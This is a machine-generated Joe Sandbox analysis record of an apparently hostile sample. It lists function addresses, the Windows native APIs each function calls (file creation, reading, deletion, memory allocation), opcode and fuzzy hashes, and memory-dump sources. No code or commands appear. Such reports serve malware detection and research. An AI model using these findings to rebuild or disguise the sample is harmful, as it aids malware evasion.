                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 19292b63e4b317acbb78e3be01ab1894ace079b04d70c33c0bb853ef10a72a74
                                                                • Instruction ID: d7a41201fc9eaa1ae84bb02de36ac94ac826b2219248cbd8c8a91ddab54ca54a
                                                                • Opcode Fuzzy Hash: 19292b63e4b317acbb78e3be01ab1894ace079b04d70c33c0bb853ef10a72a74
                                                                • Instruction Fuzzy Hash: 6F31A171940348BBDB30EBA4CCC5FFF777CAB44B05F144458BD58A7191EA70AA859BA0
                                                                Function 00C78BF0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00C78CF4
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: e53c7a40a810f1b3d3a1426600ea00ef0481a5de54bcdeac6922c8fb3a5ed740
                                                                • Instruction ID: 91dfcf7718e2de2e91159cca635e31f6246baca658c3a82a38616b0e2b2f5bf6
                                                                • Opcode Fuzzy Hash: e53c7a40a810f1b3d3a1426600ea00ef0481a5de54bcdeac6922c8fb3a5ed740
                                                                • Instruction Fuzzy Hash: 4831C0B5A00209AFDB14DF98D881EEFB7F9EF88714F108219FD19A7244D730A8458BA5
                                                                Function 00C78D60 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00C78E49
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: c6e7bd6947f284e5ef1215bd066bc9917e70c7b5ef1f4a78b30f1bcd027155f5
                                                                • Instruction ID: 565f21b5b92e98956f7bb0ce757b43ef677ec0055e8b97e72edeedb2e5bc8fb3
                                                                • Opcode Fuzzy Hash: c6e7bd6947f284e5ef1215bd066bc9917e70c7b5ef1f4a78b30f1bcd027155f5
                                                                • Instruction Fuzzy Hash: 2031E7B5A00209ABDB14DF98D881EEFB7B9EF88714F108219FD18A7240D730A955CBA5
                                                                Function 00C79080 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00C619EB,?,00C77ADF,00000000,00000004,00003000,?,?,?,?,?,00C77ADF,00C619EB), ref: 00C7914B
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: f1a18345f457be3864bec1a8dadc58551e1b33e8dadc84a2060cf1801d4deabe
                                                                • Instruction ID: 6c02006c10e768ebf6b9714c6f21d5341f14a675cb467e041bf0917890c1705b
                                                                • Opcode Fuzzy Hash: f1a18345f457be3864bec1a8dadc58551e1b33e8dadc84a2060cf1801d4deabe
                                                                • Instruction Fuzzy Hash: 54213BB5A00209AFDB20DF98DC81FEFB7B9EF88704F108119FD18A7245D770A9558BA5
                                                                Function 00C78E60 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: fe3285a97b4c93569c6c6f1fb61e44ebcda607a6190f0a0d6d2c1d51df3923e3
                                                                • Instruction ID: 790e73e0c82ca0ccaac8dee6667b053dbf72c8137a3bc097acde5cb2da9b5a7d
                                                                • Opcode Fuzzy Hash: fe3285a97b4c93569c6c6f1fb61e44ebcda607a6190f0a0d6d2c1d51df3923e3
                                                                • Instruction Fuzzy Hash: 1D1191719402096BE720EB58CC41FAB77ACEB88714F00C559FA1CA7181EB71694587A5
                                                                Function 00C78F10 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction ID: f1eb649f390a7483a1e45ebde08343f68dea6588062469f8c21fa85b5c92e93c
                                                                • Opcode Fuzzy Hash: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction Fuzzy Hash: A9E08C362002047BE620FA9ADC01FAB77ACEFC5725F44C019FA1CA7281CA70B9058BF5
                                                                Function 04BD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
                                                                • Instruction ID: 5d149983497a77deace508264920a5dbdc61d1331ca5d171ed68536f4b847a4d
                                                                • Opcode Fuzzy Hash: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
                                                                • Instruction Fuzzy Hash: C290023260590402F100715945147161005CBD0205F65D451A0425669D8799DA5275A2
                                                                Function 04BD4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 389be4e2f14e39577ad3a70bd35ae778981b66e006a944572e78f6f586bd19cc
                                                                • Instruction ID: 5e88fff349d7789f19231898057281b75ebf4053a9ae92a179bdaebbace3f706
                                                                • Opcode Fuzzy Hash: 389be4e2f14e39577ad3a70bd35ae778981b66e006a944572e78f6f586bd19cc
                                                                • Instruction Fuzzy Hash: 5D900262601900426140715948044166005DBE1305395D155A0555661C871CD956A269
                                                                Function 04BD4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 111beadbbacc38beeac58629a4bd6724ba6391a153848c8e473aa12f00f82baf
                                                                • Instruction ID: bff882775f5e14b8b296d0ee46c7111ecdca16c130ca4e577b548cb043185b21
                                                                • Opcode Fuzzy Hash: 111beadbbacc38beeac58629a4bd6724ba6391a153848c8e473aa12f00f82baf
                                                                • Instruction Fuzzy Hash: 31900232605C0012B140715948845564005DBE0305B55D051E0425655C8B18DA576361
                                                                Function 04BD2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
                                                                • Instruction ID: 24dfd854b1d47dee5fcec5bb9829309ce57904cbb2faaf38374f8b5a52e83e47
                                                                • Opcode Fuzzy Hash: 3b0c7a00e9136beb1f379726de6127f48dc4d131df2f32ddca209df9cecdc39c
                                                                • Instruction Fuzzy Hash: 7F90023220180402F100759954086560005CBE0305F55E051A5025656EC769D9927131
                                                                Function 04BD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
                                                                • Instruction ID: bace431588dedca7a6790826963360f40ca83c11edf2a528eb5121b3e80cf149
                                                                • Opcode Fuzzy Hash: d4581b3864eaac6f943b64f77c394923d37e2b5d4e52277870ef4f8a2c22614d
                                                                • Instruction Fuzzy Hash: 9890023220188802F1107159840475A0005CBD0305F59D451A4425759D8799D9927121
                                                                Function 04BD2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
                                                                • Instruction ID: c621560d602fda867b196f7b89b2bc1470dd1a21ccce025b349f846b65745b2c
                                                                • Opcode Fuzzy Hash: 9aea074282211a01544e43a7b35b497a21a3c2a8e05be4fdecc1d43f0af79054
                                                                • Instruction Fuzzy Hash: E190023220180842F10071594404B560005CBE0305F55D056A0125755D8719D9527521
                                                                Function 04BD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
                                                                • Instruction ID: 155cadcdb3e84791afcc0b144f45141414e9f13a245d3f65683a7f7c7edb5cec
                                                                • Opcode Fuzzy Hash: d35c20357aef3050d152420a0342254f7ad647f4fc117ba9bf4a470aec3a297d
                                                                • Instruction Fuzzy Hash: 9390023220180413F111715945047170009CBD0245F95D452A0425659D975ADA53B121
                                                                Function 04BD2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
                                                                • Instruction ID: bffd333265f89fdb715c466db1f882ac24ef318a6a3da0b019deb01f7c887a52
                                                                • Opcode Fuzzy Hash: c41b9af25b98c58b09f999b44bd912f3b91af86ad4afbf604fcaf83848665c11
                                                                • Instruction Fuzzy Hash: 9D900222242841527545B15944045174006DBE0245795D052A1415A51C862AE957E621
                                                                Function 04BD2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 8823f1da6b08b31f4457bf2a0ae766debfea65c69c5f34f5bbfebbef0f0390b5
                                                                • Instruction ID: 15b2413704fffccd7bf76cb64f4cc561871ece6337acd51c5ae9c324adced07b
                                                                • Opcode Fuzzy Hash: 8823f1da6b08b31f4457bf2a0ae766debfea65c69c5f34f5bbfebbef0f0390b5
                                                                • Instruction Fuzzy Hash: 0390022230180003F140715954186164005DBE1305F55E051E0415655CDA19D9576222
                                                                Function 04BD2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
                                                                • Instruction ID: 166748229a3b8c12b60bea6b13829603b868b7bb9d55510ac29d1965f4b904d0
                                                                • Opcode Fuzzy Hash: 6fe5487f99fc3ee77fdbf40bdeeb0a60634c57d27599188d575781971d74f350
                                                                • Instruction Fuzzy Hash: AC90022A21380002F1807159540861A0005CBD1206F95E455A0016659CCA19D96A6321
                                                                Function 04BD2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 45dc910cfb0852453f763ddcb75c7cacb7836ee8fe760b5a83937a315a2bac67
                                                                • Instruction ID: a17817b54830f03cc333cc4fb3b443d055ff4ec6560e39e8dc8ac107d0f83f90
                                                                • Opcode Fuzzy Hash: 45dc910cfb0852453f763ddcb75c7cacb7836ee8fe760b5a83937a315a2bac67
                                                                • Instruction Fuzzy Hash: 1190022260180502F10171594404626000ACBD0245F95D062A1025656ECB29DA93B131
                                                                Function 04BD2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: dc41fd5f0ab0ce7bfebf4d4886325ea56bc2cc0b4755561261fd6955772779cc
                                                                • Instruction ID: ca9b46b4f4686e4184466a69b9d9a7b81cb33c0ded2bc6df219406d8a1978d0c
                                                                • Opcode Fuzzy Hash: dc41fd5f0ab0ce7bfebf4d4886325ea56bc2cc0b4755561261fd6955772779cc
                                                                • Instruction Fuzzy Hash: DF900262201C0403F140755948046170005CBD0306F55D051A2065656E8B2DDD527135
                                                                Function 04BD2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 57a8dbd390d9cb61f5537ae57ead153a29d920863ffba7866fa9aed3ea1fbd92
                                                                • Instruction ID: 323eca1f097ef7b4c2b0c7d680f876627fdb873e233031c6e5b680a764fc5a0c
                                                                • Opcode Fuzzy Hash: 57a8dbd390d9cb61f5537ae57ead153a29d920863ffba7866fa9aed3ea1fbd92
                                                                • Instruction Fuzzy Hash: 1F900222601800426140716988449164005EFE1215755D161A0999651D865DD9666665
                                                                Function 04BD2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
                                                                • Instruction ID: b549f27219203a72adb52f0d67a63b1fed48af6ed52807bb8fa2cd91582fb9f6
                                                                • Opcode Fuzzy Hash: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
                                                                • Instruction Fuzzy Hash: B6900222211C0042F20075694C14B170005CBD0307F55D155A0155655CCA19D9626521
                                                                Function 04BD2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
                                                                • Instruction ID: 1a047a3daa8a1b54f750421a55bf7cd403f569607573c549cce85c26b53e07ac
                                                                • Opcode Fuzzy Hash: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
                                                                • Instruction Fuzzy Hash: 7590026234180442F10071594414B160005CBE1305F55D055E1065655D871DDD537126
                                                                Function 04BD39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9bfa7aec17b808e9b65fedfd34e65f30ba5038a21e089c8fff30d0c6f0e9eb37
                                                                • Instruction ID: 74c0ccb108119805bb23428de729a5b4d3250e4e59a19c2d60e05ceb465064a6
                                                                • Opcode Fuzzy Hash: 9bfa7aec17b808e9b65fedfd34e65f30ba5038a21e089c8fff30d0c6f0e9eb37
                                                                • Instruction Fuzzy Hash: 4190022224585102F150715D44046264005EBE0205F55D061A0815695D8659D9567221
                                                                Function 04BD2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 531c4afc94543db0b73d63803d28fc0fae3841aadbfb94614b9f7c82fd21039e
                                                                • Instruction ID: 157562f83d0b05ddcc3f029b519e371737a272f57b988a6949807134919406f7
                                                                • Opcode Fuzzy Hash: 531c4afc94543db0b73d63803d28fc0fae3841aadbfb94614b9f7c82fd21039e
                                                                • Instruction Fuzzy Hash: 1F900226221800022145B559060451B0445DBD6355395D055F1417691CC725D9666321
                                                                Function 04BD2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                                • Associated: 00000006.00000002.4133421919.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_4b60000_control.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
                                                                • Instruction ID: f143598ae6e0d91e5bbe7e8ea79f2193450d5c637d67b452eb7f8c01345b9f8c
                                                                • Opcode Fuzzy Hash: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
                                                                • Instruction Fuzzy Hash: 09900226211800032105B55907045170046CBD5355355D061F1016651CD725D9626121
                                                                Function 04BD2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
